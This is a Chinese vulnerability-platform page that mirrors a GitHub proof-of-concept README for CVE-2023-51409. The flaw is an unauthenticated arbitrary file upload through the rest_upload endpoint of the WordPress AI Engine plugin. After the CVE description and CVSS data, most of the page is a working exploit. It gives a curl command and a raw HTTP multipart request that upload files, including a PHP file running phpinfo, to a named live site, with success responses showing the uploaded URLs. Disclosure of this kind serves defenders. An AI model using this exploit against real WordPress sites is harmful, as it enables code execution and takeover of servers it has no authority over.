漏洞平台

POC详情： 63f637536c4e926b9597edb4f1080757e1f5d550

来源

https://github.com/imhunterand/CVE-2023-51409

关联漏洞

标题： WordPress Plugin AI Engine 代码问题漏洞 (CVE-2023-51409)
描述：WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin AI Engine 存在代码问题漏洞，该漏洞源于存在危险类型文件无限制上传漏洞。

描述

AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload

介绍

# CVE-2023-51409
AI Engine: ChatGPT Chatbot - Unauthenticated Arbitrary File Upload via rest_upload

### Description:
The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'rest_upload' function in all versions up to, and including, 1.9.98. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

```
Severity: critical
CVE ID: CVE-2023-51409
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: ai-engine
WPScan URL: https://www.wpscan.com/plugin/ai-engine
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/a3fc4bac-9be0-4a1c-b4bb-4384d80e22f7?source=api-prod
```

POC
---
CURL
```
$ cat test.txt
imhunterand.txt
$ curl -X POST http://wordpress.trusona.com/wp-json/mwai-ui/v1/files/upload -H "Content-Disposition: form-data; filename=\"test.txt\"" -F "file=@test.txt" | jq -r
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   336  100   139  100   197   1738   2463 --:--:-- --:--:-- --:--:--  4602
{
  "success": true,
  "data": {
    "id": "dc05affbc88c6d731a8fc6d122cd3839",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt"
  }
}

$ curl http://wordpress.trusona.com/wp-content/uploads/2024/02/test-1.txt
robbie.txt
```

RAW HTTP
---
Request

```
POST /wp-json/mwai-ui/v1/files/upload HTTP/1.1
Host: wordpress.trusona.com
User-Agent: curl/8.1.2
Accept: */*
Content-Disposition: form-data; filename="test.txt"
Content-Length: 206
Content-Type: multipart/form-data; boundary=------------------------8ecd2b831e8d20f4
Connection: close

--------------------------8ecd2b831e8d20f4
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: text/plain

<?php phpinfo(); ?>

--------------------------8ecd2b831e8d20f4--
```

Response
```
{
  "data": {
    "id": "1044f1ab4f6340fea9abecb331fe981c",
    "url": "http://wordpress.trusona.com/wp-content/uploads/2024/02/test.php"
  },
  "success": true
}
```

文件快照


 [4.0K]  /data/pocs/63f637536c4e926b9597edb4f1080757e1f5d550
├── [6.9K]  LICENSE
└── [2.2K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。